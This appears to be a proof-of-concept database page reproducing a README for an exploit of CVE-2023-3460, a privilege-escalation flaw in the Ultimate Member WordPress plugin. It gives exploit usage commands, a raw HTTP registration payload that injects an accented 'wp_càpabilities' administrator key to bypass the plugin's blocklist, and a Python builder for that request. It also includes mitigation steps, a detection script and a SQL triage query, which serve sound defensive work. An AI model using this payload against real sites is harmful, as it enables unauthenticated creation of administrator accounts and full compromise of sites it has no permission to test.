PoC details: 9c7688bdcce13920444eaf4102ee24f068dcaf1c

Source
Related vulnerability
Title: WordPress Plugin Ultimate Member permission and access control vulnerability (CVE-2023-3460)
Description: WordPress and WordPress plugins are products of the WordPress Foundation. WordPress is a blogging platform written in PHP; it can host personal blog sites on servers running PHP and MySQL. A WordPress plugin is an application add-on for it. Ultimate Member versions 2.6.6 and earlier contain a permission and access control flaw: privileges can be escalated through an arbitrary user meta update.
Introduction

# 🚨 CVE-2023-3460 - WordPress Ultimate Member Privilege Escalation Exploit

This is a proof-of-concept (PoC) exploit for [CVE-2023-3460](https://nvd.nist.gov/vuln/detail/CVE-2023-3460), a critical vulnerability in the WordPress plugin **Ultimate Member**. It allows **unauthenticated users** to escalate their privileges to **Administrator** by crafting a malicious registration request: the plugin blocklists sensitive user-meta keys such as `wp_capabilities`, but that check could be bypassed, so a registration submission could set the key directly. The only precondition is that the plugin's registration form is reachable (open registration).

> 🔥 **Impact:** Full site compromise through unauthorized admin account creation.

---

## 📌 Vulnerability Details

- **Plugin Affected:** Ultimate Member
- **Affected Versions:** ≤ 2.6.6
- **Fixed Version:** 2.6.7
- **Exploit Type:** Privilege Escalation via Registration Abuse
- **Authentication Required:** ❌ No
- **CVE:** [CVE-2023-3460](https://nvd.nist.gov/vuln/detail/CVE-2023-3460)

---

## ⚙️ Requirements

- Python 3
- `requests` library

Install requirements:

```bash
pip3 install requests
```

---

## 🧪 Exploit Usage

```bash
python3 CVE-2023-3460.py -t <TARGET_URL> -u <NEW_USERNAME> -p <NEW_PASSWORD> -e <EMAIL>
```

### ✅ Example:

```bash
python3 CVE-2023-3460.py -t http://localhost/register/ -u pwnadmin -p Pass@123 -e pwn@evil.com
```

---

## 📥 Exploit Script Features

- Fetches the CSRF nonce (`_wpnonce`) from the register page
- Submits the registration form with an extra user-meta field that the plugin's key blocklist does not filter
- Injects `wp_capabilities` with the `administrator` role (spelled `wp_càpabilities` in the request, see the sample payload)
- Creates a new admin user without authentication

---

## 🔐 Sample Exploit Payload

```http
POST /register/ HTTP/1.1
Host: <TARGET_HOST>
Content-Type: application/x-www-form-urlencoded

user_login=pwnadmin&user_email=pwn@evil.com&user_password=Pass@123&wp_càpabilities[administrator]=1&_um_nonce=<nonce_value>
```

The accented `à` in `wp_càpabilities` is deliberate, not a typo: the plugin compared the submitted key literally against its blocklist, so the variant passed, while the accent- and case-insensitive collation used by default in WordPress's MySQL tables matches it as `wp_capabilities` when the user's roles are read back.
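The request above, built offline as an added example (this is not the PoC's own `CVE-2023-3460.py` and not Ultimate Member code). It reads the nonce from a constructed register-page fragment and assembles the form body with the accented meta key percent-encoded as UTF-8. Assumptions not taken from the page: the nonce lives in a hidden input named `_um_nonce`, and the sample HTML and helper names are mine.

```python
"""Build the CVE-2023-3460 registration request shown in the sample payload.

Added example; not the PoC script. Only the standard library is used so it
runs without the `requests` dependency the PoC needs.
"""
import re
import urllib.parse
import urllib.request
from typing import List, Optional, Tuple

# Constructed register-page fragment standing in for a real HTTP response.
SAMPLE_REGISTER_PAGE = """
<form method="post" action="/register/">
  <input type="hidden" name="_um_nonce" value="8f3c0d2a1b" />
  <input type="text" name="user_login" />
</form>
"""

# The key the plugin blocks literally is wp_capabilities; the accented variant
# slips past a literal comparison but collates equal to it in MySQL's default
# accent-insensitive utf8mb4 collations.
INJECTED_META_KEY = "wp_c\u00e0pabilities"  # wp_càpabilities


def extract_nonce(html: str, field: str = "_um_nonce") -> Optional[str]:
    """Return the value of the hidden input named `field`, or None if absent."""
    pattern = re.compile(
        r'<input[^>]*name="%s"[^>]*value="([^"]+)"' % re.escape(field), re.I
    )
    match = pattern.search(html)
    return match.group(1) if match else None


def build_fields(username: str, email: str, password: str, nonce: str,
                 role: str = "administrator") -> List[Tuple[str, str]]:
    """Form fields in the order of the sample payload (field names assumed)."""
    return [
        ("user_login", username),
        ("user_email", email),
        ("user_password", password),
        (f"{INJECTED_META_KEY}[{role}]", "1"),   # the escalation field
        ("_um_nonce", nonce),
    ]


def build_body(username: str, email: str, password: str, nonce: str) -> str:
    """x-www-form-urlencoded body; urlencode emits the key as UTF-8 percent-encoding."""
    return urllib.parse.urlencode(build_fields(username, email, password, nonce))


def build_request(target: str, username: str, email: str, password: str,
                  nonce: str) -> urllib.request.Request:
    """POST request object ready for urllib.request.urlopen (not sent here)."""
    body = build_body(username, email, password, nonce).encode("utf-8")
    return urllib.request.Request(
        target, data=body,
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        method="POST",
    )


if __name__ == "__main__":
    nonce = extract_nonce(SAMPLE_REGISTER_PAGE)
    req = build_request("http://localhost/register/", "pwnadmin",
                        "pwn@evil.com", "Pass@123", nonce)
    print(req.method, req.full_url)
    print(req.data.decode("utf-8"))
```

Sending it is one `urllib.request.urlopen(req)` call against a target you are authorized to test; the point of the block is the encoded key `wp_c%C3%A0pabilities%5Badministrator%5D=1`, which is what a WAF rule or access-log search should look for.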

---

## 🛡️ Mitigation

- Update the Ultimate Member plugin to **v2.6.7** or above
- Disable open registration if it is not required
- Monitor user creation and review `wp_usermeta` for unexpected administrator capabilities on recently registered accounts
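A check for the last mitigation point, as an added example (not from the page or the plugin): it scans rows shaped like `wp_usermeta` (`user_id`, `meta_key`) for keys that a literal blocklist lets through but that MySQL's accent- and case-insensitive collations treat as `wp_capabilities` or `wp_user_level`, and shows the hardened comparison beside the weak one. The sample rows are constructed and the function names are mine.

```python
"""Detect bypass spellings of protected user-meta keys after a CVE-2023-3460
exposure window, and show a normalized blocklist check next to the literal one.

Added example; not plugin code. Rows below are constructed.
"""
import unicodedata
from typing import Iterable, List, Tuple

PROTECTED_KEYS = {"wp_capabilities", "wp_user_level"}

# Constructed (user_id, meta_key) rows as they might be exported from wp_usermeta.
# User 7 carries the accented key from the PoC payload; user 8 a case variant.
SAMPLE_USERMETA = [
    (1, "wp_capabilities"),
    (1, "wp_user_level"),
    (7, "nickname"),
    (7, "wp_c\u00e0pabilities"),   # wp_càpabilities
    (8, "WP_Capabilities"),
    (9, "description"),
]


def normalize_key(key: str) -> str:
    """Fold case and strip combining accents so spelling variants compare equal.

    This approximates an accent-insensitive MySQL collation such as
    utf8mb4_unicode_ci, which is what makes the bypass work server-side.
    """
    decomposed = unicodedata.normalize("NFKD", key)
    stripped = "".join(c for c in decomposed if not unicodedata.combining(c))
    return stripped.casefold()


def is_blocked_literal(key: str, blocklist: Iterable[str] = PROTECTED_KEYS) -> bool:
    """The weak check: exact string membership only (the pattern CVE-2023-3460 abused)."""
    return key in set(blocklist)


def is_blocked(key: str, blocklist: Iterable[str] = PROTECTED_KEYS) -> bool:
    """Hardened check: compare after normalization, so wp_càpabilities and
    WP_Capabilities are rejected exactly like wp_capabilities."""
    normalized = {normalize_key(k) for k in blocklist}
    return normalize_key(key) in normalized


def find_suspicious_meta(rows: Iterable[Tuple[int, str]],
                         protected: Iterable[str] = PROTECTED_KEYS) -> List[Tuple[int, str]]:
    """Rows whose key normalizes to a protected key but is not spelled canonically.

    A legitimate WordPress install writes these keys in lowercase ASCII, so any
    other spelling is a strong indicator of an injected meta update.
    """
    protected = set(protected)
    return [
        (user_id, meta_key)
        for user_id, meta_key in rows
        if meta_key not in protected and normalize_key(meta_key) in protected
    ]


if __name__ == "__main__":
    for user_id, meta_key in find_suspicious_meta(SAMPLE_USERMETA):
        print(f"user {user_id}: suspicious meta key {meta_key!r}")
```

The same triage can be done directly in the database: with the standard table prefix, `SELECT user_id, meta_key FROM wp_usermeta WHERE meta_key = 'wp_capabilities' AND BINARY meta_key <> 'wp_capabilities'` returns rows that the collation equates with the capability key but whose bytes differ, which is exactly the artifact this exploit leaves behind.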

---

## 📚 References

- 🔗 [Patchstack Advisory](https://patchstack.com/database/vulnerability/ultimate-member/wordpress-ultimate-member-plugin-2-6-6-authenticated-privilege-escalation-vulnerability)
- 🔗 [CVE-2023-3460 on NVD](https://nvd.nist.gov/vuln/detail/CVE-2023-3460)

---

## ⚠️ Disclaimer

This script is provided for **educational and authorized testing purposes only**. Unauthorized exploitation of systems is illegal and unethical. Use it **only** on systems you own or have permission to test.

---

## 👨‍💻 Author

- 💀 GURJOT SINGH
- 🔒 [LinkedIn](https://in.linkedin.com/in/gurjot-singh-8198b3220)
File snapshot

```
[4.0K] /data/pocs/9c7688bdcce13920444eaf4102ee24f068dcaf1c
├── [3.5K] CVE-2023-3460.py
└── [2.4K] README.md

0 directories, 2 files
```